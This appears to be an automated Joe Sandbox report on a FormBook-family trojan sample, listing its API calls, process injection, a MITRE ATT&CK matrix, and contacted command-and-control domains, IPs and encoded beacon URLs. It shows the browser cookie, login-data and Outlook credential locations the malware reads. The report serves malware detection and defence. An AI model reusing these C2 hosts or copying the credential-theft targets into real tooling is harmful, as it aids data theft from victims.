Code function: 0_2_00C648D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00C648D7

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CC4C53 mouse_event,

0_2_00CC4C53

Source: C:\Users\user\Desktop\CJE003889.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CJE003889.exe"	Jump to behavior
Source: C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe	Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CB7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00CB7CAF

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CB874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00CB874B

Source: CJE003889.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: CJE003889.exe, mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: mcPAaApkdo.exe, 00000005.00000002.3491589842.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000005.00000000.2065781217.0000000001390000.00000002.00000001.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000000.2215830760.0000000000EC0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C8862B cpuid

0_2_00C8862B

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C94E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00C94E87

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00CA1E06 GetUserNameW,

0_2_00CA1E06

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C93F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00C93F3A

Source: C:\Users\user\Desktop\CJE003889.exe

Code function: 0_2_00C649A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C649A0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\ROUTE.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\ROUTE.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: CJE003889.exe	Binary or memory string: WIN_81
Source: CJE003889.exe	Binary or memory string: WIN_XP
Source: CJE003889.exe	Binary or memory string: WIN_XPe
Source: CJE003889.exe	Binary or memory string: WIN_VISTA
Source: CJE003889.exe	Binary or memory string: WIN_7
Source: CJE003889.exe	Binary or memory string: WIN_8
Source: CJE003889.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3491828564.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3491386703.00000000008B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2149646425.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3491887739.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2142478185.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2150676929.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3490916220.00000000028F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3491866393.0000000003530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CD6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00CD6283
Source: C:\Users\user\Desktop\CJE003889.exe	Code function: 0_2_00CD6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00CD6747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
CJE003889.exe	26%	ReversingLabs	Win32.Trojan.AutoitInject
CJE003889.exe	26%	Virustotal		Browse
CJE003889.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.313333.xyz/5jna/	0%	Avira URL Cloud	safe
http://www.epayassist.net/sk-logabpstatus.php?a=a1l6S1drb3FtcGMvdlFHNDVXelp6VFg3bWdKdW1EME1NODd3V1Zs	0%	Avira URL Cloud	safe
https://www.west.cn/services/mail/	0%	Avira URL Cloud	safe
http://www.erexolsk.shop/jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi	0%	Avira URL Cloud	safe
https://www.west.cn/services/domain/	0%	Avira URL Cloud	safe
http://www.mzkd6gp5.top/0hqe/	0%	Avira URL Cloud	safe
http://www.grimbo.boats/mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHi	0%	Avira URL Cloud	safe
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)	0%	Avira URL Cloud	safe
http://www.balanpoint.life/0cbv/	0%	Avira URL Cloud	safe
https://www.west.cn/services/webhosting/	0%	Avira URL Cloud	safe
http://www.epayassist.net/px.js?ch=1	0%	Avira URL Cloud	safe
https://www.erexolsk.shop/jh0k/?gnlxDxt=cE	0%	Avira URL Cloud	safe
http://www.epayassist.net/px.js?ch=2	0%	Avira URL Cloud	safe
http://www.erexolsk.shop/jh0k/	0%	Avira URL Cloud	safe
http://www.grimbo.boats/mjln/	0%	Avira URL Cloud	safe
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)	0%	Avira URL Cloud	safe
http://www.erexolsk.shop	0%	Avira URL Cloud	safe
https://www.west.cn/ykj/view.asp?domain=313333.xyz	0%	Avira URL Cloud	safe
http://www.313333.xyz/5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi	0%	Avira URL Cloud	safe
https://www.west.cn/jiaoyi/	0%	Avira URL Cloud	safe
http://www.wuyyv4tq.top/0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi	0%	Avira URL Cloud	safe
http://www.balanpoint.life/0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g=	0%	Avira URL Cloud	safe
https://www.west.cn/cloudhost/	0%	Avira URL Cloud	safe
http://www.mzkd6gp5.top/0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi	0%	Avira URL Cloud	safe
http://www.epayassist.net/sjh2/	0%	Avira URL Cloud	safe
http://www.epayassist.net/sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dns.ladipage.com	13.228.81.39	true	false	high
www.epayassist.net	208.91.197.27	true	true	unknown
www.mzkd6gp5.top	172.67.158.81	true	true	unknown
www.grimbo.boats	172.67.182.198	true	true	unknown
www.balanpoint.life	209.74.79.40	true	true	unknown
www.mosquitoxp.lol	38.180.232.109	true	true	unknown
www.313333.xyz	103.120.80.111	true	true	unknown
www.wuyyv4tq.top	156.226.63.13	true	true	unknown
www.erexolsk.shop	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.grimbo.boats/mjln/?gnlxDxt=mRd2QOrZow0Zy8rcEJSXGRznkeTfTdv0yZ2YG4FUDMPe/4koX4+1ymts9nnhEJy5dYKCFioRx0Zy3sftYsziig07/zAt0ecRqm4eM3zYCvLGPFaM+s8J2dY=&Cpbp2=zjh46zEHi	true	Avira URL Cloud: safe	unknown
http://www.balanpoint.life/0cbv/	true	Avira URL Cloud: safe	unknown
http://www.313333.xyz/5jna/	true	Avira URL Cloud: safe	unknown
http://www.erexolsk.shop/jh0k/?gnlxDxt=cE+iwc0yj830uuhklCcrX/wOzR3WnF1m5/XKwWZdu8qZVYJFuXJD1Zapdap+RxDw3ImSWqBjcd0u94ZA4St+7Z5LUmDNQvXJfTb2ufMRWduIOzpab4DfT5A=&Cpbp2=zjh46zEHi	true	Avira URL Cloud: safe	unknown
http://www.mzkd6gp5.top/0hqe/	true	Avira URL Cloud: safe	unknown
http://www.grimbo.boats/mjln/	true	Avira URL Cloud: safe	unknown
http://www.313333.xyz/5jna/?gnlxDxt=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&Cpbp2=zjh46zEHi	true	Avira URL Cloud: safe	unknown
http://www.erexolsk.shop/jh0k/	true	Avira URL Cloud: safe	unknown
http://www.wuyyv4tq.top/0qmw/?gnlxDxt=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=&Cpbp2=zjh46zEHi	true	Avira URL Cloud: safe	unknown
http://www.balanpoint.life/0cbv/?Cpbp2=zjh46zEHi&gnlxDxt=1lixiFn2nPh88HonPghJDFAFcnnzyrdvNvLcEc2wPpGyfhd+75GCEpQKEfA1MXagijVYaOCU2MEqrz5pMxxhEIji4Qs6Ro2dwyRTrjDFXU7ZlJam3DSGN9g=	true	Avira URL Cloud: safe	unknown
http://www.mzkd6gp5.top/0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi	true	Avira URL Cloud: safe	unknown
http://www.epayassist.net/sjh2/	true	Avira URL Cloud: safe	unknown
http://www.epayassist.net/sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://dts.gnpge.com	mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.west.cn/services/webhosting/	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.epayassist.net/sk-logabpstatus.php?a=a1l6S1drb3FtcGMvdlFHNDVXelp6VFg3bWdKdW1EME1NODd3V1Zs	ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.west.cn/services/domain/	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.west.cn/services/mail/	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.epayassist.net/px.js?ch=1	ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.epayassist.net/px.js?ch=2	ROUTE.EXE, 00000006.00000002.3492415210.000000000406C000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000031EC000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.erexolsk.shop/jh0k/?gnlxDxt=cE	ROUTE.EXE, 00000006.00000002.3492415210.0000000004522000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.00000000036A2000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.erexolsk.shop	mcPAaApkdo.exe, 00000007.00000002.3491386703.0000000000904000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.west.cn/ykj/view.asp?domain=313333.xyz	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.west.cn/jiaoyi/	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false		high
https://www.west.cn/cloudhost/	ROUTE.EXE, 00000006.00000002.3492415210.0000000003BB6000.00000004.10000000.00040000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3493766399.0000000006090000.00000004.00000800.00020000.00000000.sdmp, mcPAaApkdo.exe, 00000007.00000002.3492217014.0000000002D36000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	ROUTE.EXE, 00000006.00000003.2331961284.0000000002B4C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.182.198	www.grimbo.boats	United States	13335	CLOUDFLARENETUS	true
172.67.158.81	www.mzkd6gp5.top	United States	13335	CLOUDFLARENETUS	true
38.180.232.109	www.mosquitoxp.lol	United States	174	COGENT-174US	true
209.74.79.40	www.balanpoint.life	United States	31744	MULTIBAND-NEWHOPEUS	true
103.120.80.111	www.313333.xyz	Hong Kong	139021	WEST263GO-HKWest263InternationalLimitedHK	true
208.91.197.27	www.epayassist.net	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
13.228.81.39	dns.ladipage.com	United States	16509	AMAZON-02US	false
156.226.63.13	www.wuyyv4tq.top	Seychelles	133201	COMING-ASABCDEGROUPCOMPANYLIMITEDHK	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572869
Start date and time:	2024-12-11 04:48:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	CJE003889.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@9/8
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 92% Number of executed functions: 51 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
